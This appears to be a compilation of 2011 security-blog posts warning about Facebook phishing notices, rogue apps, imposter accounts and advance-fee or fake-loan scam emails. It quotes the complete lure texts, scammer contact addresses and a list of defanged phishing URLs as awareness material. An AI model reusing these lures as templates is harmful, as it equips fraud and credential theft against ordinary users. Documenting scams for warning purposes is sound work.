5. Perform actions that interfere with and you have been reported by other facebook users.
6. Clicking on a link or links that are wrong and contain the negative content.

Please confirm within 24. when you suspect that you have not been confirmed, the system will automatically close your facebook account permanently with the presumption that such indication is correct.
Please confirm your facebook account by clicking the link below:

http://malicious_links/

Thank you for helping improve our service.

Facebook ™ security
Up @ 2010 copyrights network inc.

—

The security system we found an indication that you are violating the Terms of Service (TOS) to do a post that contains pornographic, insulting, hateful, threatening, inciting, violence, violations of copyrights or contains nudity.

Please confirm within 24 hours if you feel there has been a mistake.
If you do not confirm, the system will automatically close your facebook account
permanently with the presumption that such indication is correct.

Thank you for helping improve our service.

Security Facеbооk ™
Facеbооk © 2010 Cоpγгіght Nеtwоrk Inc..
█║▌│█│║▌║││█║▌│║█║

Please confirm your facebook account on the following link:
——————–

http://malicious_links/

——————–

Please confirm your Facebook account immediately to avoid permanent closure.
We apologize for the inconvenience.

—

Our team has seen your facebook activity, and we have seen that you have not done FACEBOOK confirmation. Immediately re-confirm your FACEBOOK before 12 February 2011. If FACEBOOK you in that time have not done your FACEBOOK confirmation then we will be permanently disabling. please note it wisely.

Immediately re-confirm your FACEBOOK at the address below:

===============================

http://malicious_links/

===============================

Thanks,

Mark Zuckerberg

Fαcеbооk ™ sеcuгiтy
Fαcеbооk © 2011 Cоpyгighт петwогk Iпc.
█║▌│█│║▌║││█║▌│║▌║

—

Your account will be desactivated immediatly. Because someone has reported your actions. Maybe you have written content that is abusive or upload a picture taht can be insulting or harmful to other users. You must confirm your account, to stp the warning desactivated on your account. Please re-confirm your account at:
◄ ▬ V I P® ▬ ► = Hotmail

http://malicious_links/

◄ ▬ V I P® ▬ ► = Yahoo

http://malicious_links/

◄ ▬ V I P® ▬ ► = GmaiL

http://malicious_links/

We provide 24 hours to re-confirm your facebook account. If not, we will desactivate your account for the benefit of other users

—

Some screenshots of the phishing page:

And here’s the list of known malicious site (keep stay away from these site, some link are still active):

• hxxp://apps.facebook.com/notificationfacebook/
• hxxp://apps.facebook.com/confirm-register/
• hxxp://lucksteven.001webs.com
• hxxp://network-official.active.ws/
• hxxp://security-confrim-facebook-registrations.tk/
• hxxp://apps-facebook-privacy-account-safety.webs.com/
• hxxp://help-account-facebook-security.webs.com/
• hxxp://apps.facebook.com/commemorations/
• hxxp://secure_center.t35.com
• hxxp://customer-supports-account.webs.com/facebook-security/
• hxxp://djarum-black.24.eu/
• hxxp://h1.ripway.com/bkle001/
• hxxp://www.admln-security-games-fcebook.webs.com/
• hxxp://andhy_cuewk.0fees.net/
• hxxp://apps.facebook.com/users-registration/
• hxxp://account-confirmation-2010.ij3.de
• hxxp://registration-account-system.tk/
• hxxp://zliti.host.sk/62/login.facebook.com/?id=26089&lc=us
• hxxp://verify-account-system.com.nu
• hxxp://comfirm-facebook-security-online.tk/
• hxxp://customer-help-support-account.service.lc/facebook-security/
• hxxp://service-centre-account-games-poker.webs.com/
• hxxp://confirm-account-facebook-by-police-facebook.tk
• hxxp://security-inc.mypiece.com/
• hxxp://accountsecuritywarning.tk/
• hxxp://facebook.security-confirmations.com
• hxxp://gamepot.surge8.com
• hxxp://apps-facebook-security-report-games.webs.com/
• hxxp://privacy-police.ucoz.ru/facebook.html
• hxxp://facebook-security-account-notifikation-inc.tk/
• hxxp://apps-facebook-grandprize-millions-chips-zyngapoker.tk/
• hxxp://customer-help.us.nf/facebook-security/
• hxxp://confirmation-account-security-facebook.tk/
• hxxp://mehdiz.freevnn.com/scama/hotmail/en/?i=1064
• hxxp://mehdiz.freevnn.com/scama/yahoo/en/?i=1064
• hxxp://mehdiz.freevnn.com/scama/gmail/en/?i=1064

If you got a suspicious message or email, you can forward it to us [malware@computersecurityarticles.info], or you also able to submit the malicious file via “Virus Submit“.

And don’t forget to join our Facebook! Stay alert & Stay Safe!

Our previous post about malicious links being spammed out on Facebook said that the links were phishing attempts. Well, turns out it’s also a spyware scam.

So the links we saw being sent around led to a fake Facebook log-in page:

Looks like a plain vanilla phishing attempt so far. However, further testing with a dummy account showed that something a bit more interesting is going on.

If you enter your account details into the supposed log-in page, you’re directed to this enticing notice:

Who doesn’t want a free iPad, right? If you then click on the ‘Claim Now’ buttons for any of the oh-so-lovely prizes, you then get taken to this site:

Still no prizes for far. If you click on the big shiny button on that page, you get this:

And if you do download that, you get a consolation prize of…spyware. And you just paid for it with your account details. Shortly afterwards, Facebook got back to us about some suspicious access activity in our dummy account:

No, that’s not where we are. Clicking the ‘I don’t recognize’ button led to a new password creation page, which we could use to recover the dummy account.

OK, so this scam is still not terribly new or original. We blogged about a roughly similar scam running around Twitter in August of last year.

Fortunately, the malicious links directing users to these sites are now inactive, and most of the related sites seem to be down. Our product also detects and removes the downloaded spyware.

Still, stay alert and stay safe.

- Post by Shantini

On 22/02/11 At 03:00 AM

Should you be afraid if an imposter duplicates a friend’s Facebook account and connects with you on the social network?

@michaelgrayer
Michael Grayer

/@gcluley A facebook friend had her account duplicated and I accepted the imposter’s friend request (since unfriended). Should I be worried?

February 20, 2011 10:42 am via webRetweetReply

That’s the question I was asked on Twitter this weekend, and I thought rather than try and squeeze my response to Michael into 140 characters it probably warranted a few more bytes worth of attention.

The short answer as to whether you should be afraid or not, even if you have since unfriended the bogus user, is “possibly”.

First things first, why might someone have created an account in the name of somebody you know and attempted to trick you into accepting them as a friend? Here are some possibilities:

• Stalker. We don’t know who it is who is trying to enter your circle of friends on Facebook, but it could be someone who wants to track your activity without you know. Possibilities include a jealous partner you’ve fallen out with, a rival in love or business, or simply someone who has an unhealthy crush on you.Whatever their motive, someone stalking your online activities and able to read your newsfeed without your permission is creepy. Imagine, for instance, the possibility of coming to harm if you are using a service like Facebook Places which allows other users to determine your physical location.
• Identity thief. Your bogus Facebook friend may be interested in your profile because of the information you might be sharing up there.In the past we’ve discovered that many users are all too willing to share a dangerous amount of personal information with complete strangers on Facebook – such as their full date of birth, email address, and phone number. This is all information that could be useful to identity thieves.
• Spammer/Malware author. You’re more likely to open a message from a Facebook “friend” than a complete stranger, because you implicitly trust the person you believe has sent you the message. Therefore, if a bogus Facebook friend sends you a link to a webpage with an alluring enough title, you might well click on it.Don’t be surprised if you’re taken to a webpage containing adverts for improving your sexual performance, or a website carrying a malicious Trojan horse, a rogue Facebook application that tricks you into taking a survey, or even a bogus Facebook login page that attempts to phish your password from you.

So, imposters posing as your friends on Facebook can use the tactic to keep tabs on you, to steal personal information from you, and to try to spread malware and spam.

But more than that, they can use your acceptance of them into your network of friends as a springboard for connecting with others on Facebook too. For instance, imagine Bogus Ben manages to trick you into becoming Facebook friends with him. Bogus Ben can then approach your other friends, and the fact that he is already linked on Facebook to you effectively endorses him to them.

Don’t forget that anyone can create an account on Facebook which uses a bogus name, and scrape together some personal information and a photograph to make it a convincing fake identity to trick you into accepting their friend request. Websites like FriendsReunited and Classmates have made it easy to work out who individuals might have known years before, and give imposters a head start as to who they might want to pose as.

Of course, stalking, spamming, spreading malware and identity theft can all occur on Facebook without creating a bogus account. It’s also important to realise that cybercriminals have often hijacked genuine users’ accounts to spread these sorts of attacks too. So you may already have added a legitimate friend to your network on Facebook, only for their account to later begin to send you, for instance, spam-laden links

But to go back to the original question – should you be afraid?

Well, that rather depends on what information you share on your Facebook page, or whether you clicked on any links or ran any applications promoted by the imposter.

If you find that you’ve befriended a false Facebook friend, unfriend them immediately and warn your genuine friends about what happened in case they have also added them to their network. You should also check out our tips for better security and privacy on Facebook to make sure that you are following best practices to defend your account.

One thing you definitely need to learn is that it’s sadly just not possible to tell if you should accept someone’s friend request on Facebook just because you recognise their name. Everything on Facebook can be faked, and so the only way you can tell if a friend request was genuine or not is to speak (yes, in real life!) with the person who is trying to add you as a friend.

Otherwise, it might be an imposter, and their motive might vary from mischief to malice.

If you want to learn more about threats on Facebook, join the Sophos Facebook page where more than 60,000 people are benefiting from early warnings about the latest attacks.

If you receive a message like following:

Hello : [name]

Thanks for playing on Zynga applications.

We have reviewed the suspension on your account. After reviewing your account activity, it was determined that you were in violation of our Terms of Service. We have provided a warning to you via email, but you do not respond to our notification. Therefore, your account is permanently suspended, and will not be reactivated for any reason.

If you think this is a mistake, please verify your account on the link below. This would indicate that your account does not have a violation in playing on our application. We will immediately review your account activity, and we will notify you again via email.

Verify your account immediately at the link below:

hxxp://www.admln-security-games-fcebook.webs.com/

Note : If within 12 hours, you have not verified your account on our link, then you have ignored our notifications. Therefore, your account is permanently suspended, and will not be reactivated for any reason.

Thank you for your attention.

Kind regards,
Zynga Game Network Inc.
Texas HoldEm Poker.
Aттn: Inтellectuαl Properтy Agenт
444 DeHαro St., Suite 132
Sαn Frαncisco, Californiα 94107
Copyright © 2011 Zynga, Inc. All rights reserved.

They said that you are violating their rules. Please beware, this is not actually sent by Zynga. It’s a scam message that try steal your password. As long as you are not clicking the link, your account are still safe, and there’s nothing to worry about.

If you click the link, it will show you this screen:

With a message to scare users:

zyngapoker

Facebook Poker Account Confirmation

Please confirm your facebook poker account as a form of agreement that you promise to not make  a violation a second time.

Email: __________

Password: _____________

By reactivating my account, I agree to follow the Terms of Service going forward and understand that a second offense will result in my account being permanently banned.

The page was actually calling another address:

hxxp://andhy_cuewk.0fees.net/

If you click the “confirm” button, the password will be recorded and you will be redirected to zynga forum:

http://forums.zynga.com/forumdisplay.php?f=60#

If you got a suspicious email, you can forward it to us [malware@computersecurityarticles.info], or you also able to submit the malicious file via “Virus Submit“.

And don’t forget to join our Facebook! Stay alert & Stay Safe!

Phishing scams in Facebook. It’s not new and it’s not sophisticated. But they still catch the unwary and they’re still happening now, with only minor tweaks in tactics.

End 2010, we saw a run of phishing scam links being sent around via the chat feature. We’re seeing a new run at the moment. The following links are sent (from hijacked accounts) through chat messages and posts on the Walls of randomly selected friends:

• http://apps.facebook.com/dealscentral[...]/dsuguo[...]/
• http://apps.facebook.com/reallytimeto[...]/
• http://apps.facebook.com/backseatdriver[...]/
• http://apps.facebook.com/fishingfor[...]/

The links look like they would go to an App, but they just take the user to pages that look like the real Facebook log-in page:

Obviously, those page URLs aren’t legit.

Nothing fancy here, but stay alert and stay safe anyway. This looks to be a small scam run at the moment, would be nice if it died out quick. At time of writing, the first phishing link listed above is no longer active, but the others still work.

You can read more about phishing scams, or report a suspected scam, at the Facebook Phishing Scam Awareness page.

(Shantini, F-Secure)

The “BBC Lottery” scam mails are in circulation once again, with the following missive appearing in mailboxes:

—–Original Message—– From: BBC ONE NATIONAL LOTTERY
Sent: Wednesday, February 16, 2011 12:05 PM
Subject: “Final Notification”

Sincerely,
Mrs. Myleene Klass
Lottery Presenter General.
BBC One Lotto.

Apart from the fact that Myleene Klass is NOT going to send you a random email claiming you won lots and lots of money, “Mrs. Winifred Peterson” is a dead giveaway – appearing in many BBC Lottery scams time and time again. Of course, not actually playing the Lottery but winning anyway might also set some alarm bells ringing. Thanks to MrTom for sending this one over.

Christopher Boyd

Serene Branson, a CBS Los Angeles newsreader, became an unwilling YouTube star overnight after speculation spread that she had suffered a stroke while presenting from the Grammy Awards.

The footage of Serene Branson stumbling over her words quickly became viral, as users on Facebook and Twitter passed the link on to each other.

Although reports indicate that Miss Branson was not hospitalised and is “feeling fine”, interest in the video snippet continues to bubble away – and now scammers are exploiting the news story.

If you see a message like the following posted from one of your Facebook friend’s accounts don’t click on the link.

Omg this reporter had a stroke on live tv check it out [LINK]

If you do make the mistake of clicking on the link – perhaps out of morbid curiousity to watch Serene Brandon struggling in her piece to camera – you will be presented with a screen like the following claiming that what you are about to do is use a “verified app”.

Of course, the Facebook app is in reality a third-party rogue application, designed to make money for the scammers who instigated the scheme.

The scammers’ plan is to exploit interest in the Serene Brandon video, by tricking users into approving an application that will be able to access profiles and post messages onto the walls of Facebook accounts.

Clicking “Approve” is a bad idea, but many people fall for social engineering tricks like this all too easily.

What you probably don’t realise is that behind-the-scenes your own Facebook page has published the link to your online friends and family, encouraging them to also click on the link.

In this way the link spreads virally, increasing the opportunities for the scammers to make money.

And how do they make money? By presenting you with the all-too-familiar survey scam before you can watch the video footage. If you complete the survey, the scammers earn a small amount of commission – and you’ve helped them generate even more by sharing the link virally via your Facebook page.

If you made the mistake of approving the rogue application you should remove it immediately, and remove the offending messages from your Facebook profile before your friends are also roped into the scam.

If you have been hit by scams like this on Facebook, and are struggling to clean-up your profile, here’s a YouTube video I made which describes what steps you need to take:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Make sure that you keep informed about the latest scams spreading fast across Facebook and other internet attacks. Join the Sophos page on Facebook, where over 60,000 people regularly share information on threats and discuss the latest security news.

Valentine’s Day is a favorite holiday of lovers — and hackers.

For years, cybercriminals have used Valentine’s Day as a way to spread spam and viruses using e-cards and offers of bogus gifts.

Today, hackers have another avenue of attack — social media.

That’s why Randy Abrams, director of technical education at Slovakia-based antivirus software company ESET, warns users to keep an eye out for anything that looks out of the ordinary around Valentine’s Day.

“Watch out for messages from friends that are not in their usual style of writing or conversation, especially if they have a link,” Abrams said. “If you get a message from a friend, talk to the friend before you click. That’s how you find out if the friend really meant to send the link.”

Because we don’t communicate the same way across all social-media platforms, hackers will use different methods to entice potential victims.

For example, Twitter has such a tight limit on message size that shortened URLs, which disguise Web links, are prevalent in all messages, good or bad.

Hackers will often use sensationalism in the message such as, “This is so cute!” or “This is really funny!” to encourage the recipient to click on the shortened URL.

Another approach, Abrams said, is a message received through a hijacked account. The message seems to come from someone you know, so there is an inherent trust in the message.

Abrams pointed out that in April of 2010, a hacker was selling 1.5 million compromised Facebook accounts. The odds are significant that at least one of those accounts belonged to a friend or a friend of a friend of yours — or it might have belonged to you.

And in February of 2011, rogue apps calling themselves “Valentine’s Day” and “Special Valentine” were roaming free on Facebook, duping users into taking money-generating surveys and opening up their friends lists so that the apps could spread further.

So if you think a friend’s account may be compromised, send a private e-mail or pick up the phone to ask if messages he or she sent are legitimate. And always ask friends to return the favor if they see suspicious behavior coming from your account.

Abrams also suggested avoiding the use of third-party vendors to send messages through social media if possible.

“For e-cards, stick with known vendors,” he said. “If you go to a gift shop and look at a greeting card, they have a website and they are in for the long haul. You can trust them.”

The bottom line is that the hackers are out to use you and your information to make money.

“If you click on a link, they might get paid for generating traffic to the website,” Abrams said. “If you fall for a phishing attack and give someone your password because you thought there was a problem with your account, they will steal your account and try to trick your friends into doing things that make them money. If you install an app or other software, they will take control of your computer and rent it out.”

Abrams made a suggestion for this Valentine’s Day. “The Web is a great facilitator, but never replaces a true heart-to-heart. Valentine’s Day is not about trivial clichés, it’s about true sharing. Talk to your friends and loved ones. Not just links, but real conversation.”

(© Sue Marquette Poremba, SecurityNewsDaily)

Scam clue #1: FBI personnel can probably write proper English

Alert reader Brian in GFI Business Customer Support forwarded this gem:

From: Sean Dean. [mailto:Sean.Dean@Fbi.gov.us]
Sent: Thursday, February 10, 2011 5:00 AM
To: xxxxxxxx
Subject: Payment Codes: R5109176K

Steven M. Dean (Assistant Special Agent-in-Charge)

One hopes the hilariously bad spelling, punctuation, grammar and capitalization in this thing warn any recipient that it just might not be genuine.

Tom Kelchner

With Valentine’s Day approaching on February 14th, scammers on Facebook are ramping up their efforts to take advantage of the traditional day of love to make a quick buck out of unsuspecting users.

Facebook users are being tricked into clicking on messages that they believe their online friends have posted, how to put a heart or love poem on their sweetheart’s wall.

Is there a girl/boy you really like? why not show him/her via Facebook! give him/her a Love Poem and a Love Heart straight to his/her wall! Get Started Here: [LINK]

Sophos has identified a rogue Facebook application called Valentine’s Day which is responsible for the messages, but it is possible that the scammers could have created others which use similarly love-themed messages.

If you make the mistake of clicking on the link you are taken to a splash screen which displays a teaser, claiming that the application will “generate a random poem and send to one or many friends you select”.

According to the splash screen, the application has 220,673 monthly users – which may make you think that there’s nothing to be suspicious about.

However, the third-party Valentine’s Day Facebook application is a rogue app, trying to trick you into agreeing to give it the ability to post status messages to your wall as well as gather information about you including your name, photograph, gender and information about your friends.

Clicking on “Allow” is a desperately bad idea, but plenty of Facebook users already have. What they don’t realise is that application craftily and instantly posts the message advertising the rogue app to your Facebook wall, hoping to draw your online friends into the money-making scheme.

Because the scammers are not really interested in your budding romance. They just want to make money. And they do that by tricking you into taking an online survey disguised as a “Facebook Anti-Spam Verification” dialog box.

The scammers, of course, earn commission every time a survey is completed. This is a trick which they are using time and time again on Facebook, earning themselves cash by duping unsuspecting users into taking their surveys. Some surveys even ask you for your mobile phone number, and then sign you up for an expensive premium rate service.

As Valentine’s Day draws closer we can expect to see more and more scammers and cybercriminals attempt to exploit it – and not just on Facebook, in the past hackers have taken advantage of the international day of love to spread malicious ecards and trick users into running dangerous code on their computers. Make sure you keep your feet on the ground about your computer’s security.

If you have been hit by scams like this on Facebook, and are struggling to clean-up your profile, here’s a YouTube video I made which describes what steps you need to take:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Make sure that you keep informed about the latest scams spreading fast across Facebook and other internet attacks. Join the Sophos page on Facebook, where over 60,000 people regularly share information on threats and discuss the latest security news.

The following is spam or scam message that sent via email or a site/blog comment. If you receive this, just ignore it, and please don’t execute the attachment if any.

1.

Do you need a loan or funding for any reason such as

a) Personal Loan, Business Expansion,
b) Business Start-up, Education,
c) Debt Consolidation
d) Hard Money Loans
loan for any thing ?

We offer loan at low interest rate of 3% and with no credit check, we
offer Personal loans, debt consolidation loans, venture capital, business
loans, education loans, home loans or “loans for any reason!”. However, Our
method, offers you the chance to state the amount of loan needed and also
the duration you can afford. This gives you a real chance to get the funds
you need!

APPLY TODAY ! FILL THE FORM BELOW TO APPLY !

FULL NAMES: _____________________________
SEX:_________________________AGE: _______
OCCUPATION____________________________…
PHONE NUMBER:____________________________
ADDRESS: ________________________________
AMOUNT OF LOAN: _________________________
LOAN DURATION:___________________________

COUNTRY—————————-
————————————–…
To Apply, you can contact us via email out. .with the above information
mohammedhassanloan@gmail.com

2.  “Re: PAYMENT NOTIFICATION!”

WESTERN UNION PAYMENT NOTIFICATION
Attention Beneficiary:
I write to inform you that we have already sent you ($4,500 USD) through Western union as we have been given the mandate to transfer your part compensation payment of ($960,500.00 USD) via western union by the (IMF).Now, I decided to email you the MTCN and sender’s name so that you will be able to pick up this ($4,500 USD) to enable us send another ($4,500 USD) today as you know we will be sending you only ($4,500 USD) per day.
Kindly write down this information and run to western union to pick up the ($4,500 USD) and call me on my direct number so that we can wire the 2nd installment.
My direct phone number is +60103083590 and my direct Email is (wunion.agent4@gmail.com). You can call or email me once you picked up this ($4,500 USD) today.Please note that i am a very busy person and might not be able to pick up your call immediately, so you can send email first.
SENDER`S NAME:Eric Wood
(MTCN): 2138731398
TEXT QUESTION: DOB
ANSWER:1960
AMOUNT: $4,500
I have been delegated to handle the sending of this money due to its magnitude. Respond to me as soon as you get it without hesitation.
Thanks,
Mathew Lang

3.

Hello, Are You Desperately in need of a loan help? Have you be denied of a loan from your bank or any Financial Firm? Do you need financial assistance? Do you need a loan to pay off your bills or buy a home? Do you want to have a Business of your own and you need Financial Loan Help? Contact us today for your Financial Loan Help. We are willing to help you out on either Business or Personal Loans Offer are Available and at affordable interest rate of 3%. Interested Persons should contact us via E-mail:fambarist24@bluesash.net

First Name:_________________________________________

Last Name:__________________________________________

Gender:_______________________ _____________________

Marital status:_____________________________________

Contact Address:____________________________________

City/Zip code:______________________________________

Country:____________________________________________

Date of Birth:______________________________________

Amount Needed as Loan:______________________________

Loan Duration:______________________________________

Monthly Income/Yearly Income:_______________________

Occupation:_________________________________________

Purpose for Loan:___________________________________

House Phone:________________________________________

Cell Phone:______________________ __________________

contact us on our email;fambarist24@bluesash.net
============================
we will be waiting to have the form back from you so that we can start processing.
Regards,Mr Steve Moore

4. “Re:Hello”

I am contacting you base on mutual trust as I do not want problems but just hope you can assist me in actualizing the under mentioned project.I am in control of the sum of four million, eight hundred and fifty thous and US dollars ($4,850,000.00) which was an excess of profit made by our one of our branch Office in the Last quarter Financial Summery of last year 2009, The afore Mentioned amount I have been carefully placed in an Escrow Deposit Account with systematize procedures without declaring it to my executives.Can I really trust you to hold this money for me until I arrive your country and pick it up myself and you deduct 30% of the total money as your commission if you accept my offer you can contact me immediately.

All I need, is you to provide me with a good current bank account where I can move this money through a laid down modalities.I will confidentially, give you all the information concerning the account and the date of deposit so that you can apply to the bank for the release of the money. There is practically no risk involved. It will be a bank-to-bank wire transfer. I hope you understand my situation.

Be rest assured that this transaction is absolutely risk free.I await your urgent response.You can mail me back on this email address: martinlang3@yahoo.com.hk

Thank you and God bless.
Yours truly,
Martin Lang

5.

goodfavourloancompany:
I am answering your dire need of a loan because I am a lender and we
can help you get the loan that you need.galaxy company is
offering loans at a very low interest rate 3% and loan offer ranges
from $5,000 to $800,000.Do you want to boost your business or
financial status.personal ,company,car,mortgage loans all available
for grabs. Contact us for more informations today via
goodfavourloancompany

6.

Do you need a loan of any kind? We give out loans to all parts of the world,
our offer is convenient with affordable repayment scheme. Interest rate is
3% annually with a maximum duration of 50 years. Apply now irrespective of
your credit status. Contact us at
janeberryloancompany@yahoo.com

7. “YOU ARE A LUCKY WINNER “CONGRATULATIONS” OPEN ATTACHMENT”

SHELL PETROLEUM LOTTERY
WINNING NOTIFICATION.
IN COLLARBORATION WITH SHELL PETROLEUM DEVELOPMENT COMPANY
{SPDC} AND BRITISH AMERICAN TOBACCO COMPANY.
Shell UK Limited Shell Centre London SE1 9NA:
REF Nº: EGS/2251256003/02
BATCH Nº: 14/0017/1PD
WINNING Nº: 60/84/27/17/36
OFFICIAL WINNING NOTIFICATION
Dear winner,
Winner in the 2nd category of our Shell Management free Net Lottery Promotional
award draws held on Febuary 1st 2011. I am writing in respect to your lotto
winning prize of US$500,000.00 Dollars (Five hundred thousand Dollars only)
which you won through the email ballot draws in our Shell Management Lotto
Award on Febuary 1st 2011 in the second category prize winnings. Shell enjoyed
a reputation as a company found oil and gas. We wish to inform you that your
total prize money of US$500,000.00 Dollars has been returned to us by our Lotto
claims delivery company as unclaimed prize after their initial letter to your
address for your award payment was not successful.
We have six clearance offices zoned Continental, Namely: Canada, Brazil, South
Africa, Japan, London & Australia, clearance zones are picked randomly by
computer, each winning number falls within any of the clearance zones, is the
duty of the approved zonal clearance office to handle all clearance process to
make sure bank releases won prize in time
Your prize numbers fall at our African region approved clearance office in
Johannesburg, South Africa, in view of this; your prize money will be released
from Johannesburg: your money has been deposited in bank with insurance
coverage. Your clearance agent will facilitate payment process immediately you
contact him.
You are hereby requested to contact your clearance agent on his email address
below for your immediate award payment.
Name: Engr. GORDON SMITH
Office Address: Shell Building No: 68 Von Brandies Street Johannesburg,South
Africa.
Email: gordonsmith2010@live.com
Email:claimagent2010@luckymail.com
Mobile: +27 734469407
NOTE: ANY BREACH OF CONFIDENTIALITY ON THE PART OF THE WINNERS
WILL RESULT TO DISQUALIFICATION. WINNING RESULT MUST BE KEPT
SECRET TO AVOID DOUBLE CLAIM WHICH WILL RESULT TO YOUR LOST OF
PACKAGE.
Please note: You have to reconfirm your full details to him such as:
1. Name in full:…………………………………..
2. Address:…………………………………………..
3. Nationality:…………………………………………
4. Age:/Sex …………………………………………………….
5. Occupation:……………………………………………….
6. Phone/Fax:………………………………………………….
7. Present Country:………………………………………………
Thanks,
Sincerely yours Prof. Carl Allison
(President; Int’l Lotto Org.)
IMPORTANT NOTICE
Make sure you keep contact only with the approved clearance agent, any
transaction you hold with other persons beside him is at your own risk, be aware
that your paying authority will affect payment swiftly upon satisfactory report,
verifications and validation provided by the clearance office prior payment in
accordance with policy of organizers of this promotion.
SIMPLY REPLY TO YOUR CLEARANCE AGENT

8.

Good Day

We give out financial assistance to those who have a dream business but is faced with the challenges of finance.We help you actualize your dream faster and easier in a way of rendering you financial assistance.You can obtain loan from us at a very low interest rate. Grab this opportunity now. You can contact us via our mail:

richardchristensen1@live.com
Thanks
Mr. Richard Christensen

9.

Dear Sir/Madam.,

I am Mr. John Kelly (CEO) Kelly Loans Inc,
I am a private loan lender .We give out loans to business people and
individuals for just 3% interest rate.

We give out local and international loans to any body all over the
world.We give out loans via account transfer to what ever country you
are.We are not a bank and we do not require much documents.

If you are interested in getting a loan from our company, contact us
with the following details.(johnkellyloans@gmail.com)
==================================
FIRST NAME:……………
LAST NAME:…………..
ADDRESS:……………..
COUNTRY:………………
SEX:………………
HOME PHONE NUMBER:………..
VALID CELL PHONE NUMBER………….
FAX NUMBER: ………….
OCCUPATION:………….
MONTHLY INCOME………..
AGE:…………………
LOAN AMOUNT NEEDED:……
LOAN DURATION…………

Thanks.
Mr John Kelly…

10.

This is johnsonsmithloancompany10@gmail.com,is a private loan lender.We provide funding
for companies and individuals that need funding. We work domestic as well
as international companies. Our funding sources specialize in creative
solutions to meet your needs for expansion, growth etc.Our company do
grant loans to individuals and companies as the loan grant varies from
$3,000,00USD to $150,000,00USD with an interest rate of just 2.5% and
business loan ranging from $15,000,00USD to $30,000,000,00USD

Borrower’s Information Needed
Full Names:……………………
……………………
Country:…………………. ………………………..
Phone Number:………………….. …………………
Loan Amount Needed:………………….. ………..
Loan Term Duration:………………… …………….

Company
Registration Number: EA-ASL/941OYI/02/LN-UK
Telephone:
Fax:

Regards,

11.

Mr Maxwell Bar  has opened an opportunity to every one in need of any financial help. I give out loan to serious minded individuals. at 3% rate LOANS for developing business a competitive edge/ business expansion. * Personal Loans * Business Loans * Consolidation Loan. We are certified, trustworthy, reliable, efficient, Fast and dynamic. Contact us

via maxwellbarloanfirm@mail.mn come with this info.

AMOUNT NEEDED AS LOAN:
DURATION OF LOAN:
FULL NAMES:
COUNTRY/STATE/CITY:
TELEPHONE NUMBERS:
OCCUPATION:
MONTHLY INCOME:
MARITAL STATUS:
SEX:

Thanks.
Mr.Maxwell Bar

12.

This isjohnsonsmithloancompany10@gmail.com,is a private loan lender.We provide funding
for companies and individuals that need funding. We work domestic as well
as international companies. Our funding sources specialize in creative
solutions to meet your needs for expansion, growth etc.Our company do
grant loans to individuals and companies as the loan grant varies from
$3,000,00USD to $150,000,00USD with an interest rate of just 2.5% and
business loan ranging from $15,000,00USD to $30,000,000,00USD

Borrower’s Information Needed
Full Names:……………………
……………………
Country:…………………. ………………………..
Phone Number:………………….. …………………
Loan Amount Needed:………………….. ………..
Loan Term Duration:………………… …………….

Company
Registration Number: EA-ASL/941OYI/02/LN-UK
Telephone:
Fax:

Regards,

13. “Hi Dear,”

Hi Dear,

How are you today? I feel like communicating with you, my name is miss morrin It is my pleasure with due respect to cultivate a healthy friendship with you. I have great interest in making new friends, my hobbies are reading, traveling,swimming and dancing.

Today i found your contact email,then i took the opportunity to write to you as i will really want us to be good friends and I will so much appreciate it if we can click together as one great friend.

I will send my photo at least for you to see who is writing to you.I will like you to contact me back with this my email to my email address so that I will give you full explanation about myself, and my reasons and purpose of contacting you.

Please feel free to write me back.

Yours Sincerely,morrin

14.”LAMIDO SANUSI (GOV.CENTRAL BANK)”

Dear Friend,

My name is Malam Lamido Sanusii, my office monitors and controls the affairs of all other banks and financial institutions in Nigeria. I am the final signatory to any transfer or remittance of huge funds moving within banks both on the local and international levels. I have before me list of funds, which could not be transferred to some nominated accounts as these accounts have been identified either as ghost accounts, unclaimed deposits and over-invoiced sum etc.

I will add your name among the people expecting their funds to be transferred into their account, on this note; I wish to have a deal with you as regards to this funds. As it is my duty to recommend the transfer of these surplus funds to the Federal Government Treasury and Reserve Accounts as unclaimed deposits, I have the opportunity to write you based on the instructions I received two days ago from the Senate Committee on Contract Payments Foreign Debts to submit the List of payment reports expenditures and audited reports of revenues. Among several others, I have decided to remit this contract sum following my idea that we have a deal agreement and I am going to do this legally.

MY CONDITIONS ARE:

1. 1. The sum of USD$5.1 Million. Only will paid into an account I will provide you after you have confirmed the $10.2 million total amount transferred into your account by telegraphic Transfer (T/T), conformable in 3 working days.

2. This deal must be kept secret forever, and all correspondence will be strictly by email / telephone, for security purposes.

3. There should be no third parties as most problems associated with fund release are caused by agents or representative.

If you agree with my conditions, l advise you on what to do immediately and the transfer will commence without delay as I will proceed to fix your name on the Payment schedule instantly to meet the three days mandate. I hope you don’t reject this offer and have your funds transferred. I anticipate hearing from you.

Best Regards
Malam Lamido Sanusii
Email: lamido_sanusi1257@yahoo.com.hk
Email: lamidosanusi1120@yahoo.com
Governor, Central Bank of Nigeria (CBN)

15.

*Hi,
I am Mr.williama well-known, legitimate and an accredited money lender.
I loan money to people and companies in need of financial assistance.
Do you have bad credit or are in need of money to pay bills? Let me
take this medium to inform you that I assist beneficiary reliable as
I’ll be happy to offer a loan at 3.5% interest rate.
Services provided include:
* Refinance
* Home Improvement
* Inventor Loans
* Auto Loans
* Debt Consolidation
* Horse Loans
* Line of Credit
* Second Mortgage
* Business Lending
* Personal Loans
* International Loans
Please write back if the person accurately filled out the form below.
Upon Response, you will be sent soon as possible.
Full Names :……
Address :………
City :………
State :………
Postal Code :………
Country :………
Tel :………
Fax :………
Amount Needed: .. In USD or Euro ……….
Loan Duration :….
Loan Purpose:.
Occupation :…….
(No social security or credit check, 100% Guaranteed!)
I Look forward permitting me be of service to you. You can contact me
via e-mail: judgesmithloanfirm@gmail.com
Sincerely,
Reply as soon as possible.
william

16.

Hello,i am Mrs Jenetter Varlics from California Us,i was so most in need of loan to lift out contract so i motionless to go my bank though they refused to accede to me the loan since of credit check,so i posted the subject upon yahoo answer upon how i indispensable the loan,one Mr eric donaldson suggest the single legit loan association to me by the name Mrs Loveth Smith Loan Company,i motionless to give them the try to my biggest warn my loan was postulated as well as send to my bank comment but cosigner,collateral,credit check as well as with only 3% seductiveness rate so he grant me the loan,the sum of $3.000, i will suggest everybody out there which need the loan to hit them around this email,lovethsmith99@yahoo.com

thanks

Mrs Jenetter Varlics

17.”Investing $ 179 a day can earn $ 2000 U.S. dollars”

You Invest $ 179 and you can earn $ 1000-2000 per day automatic payment
This is evidence of payments:  http://s1.img.pl/v/1102/4754payout.gif
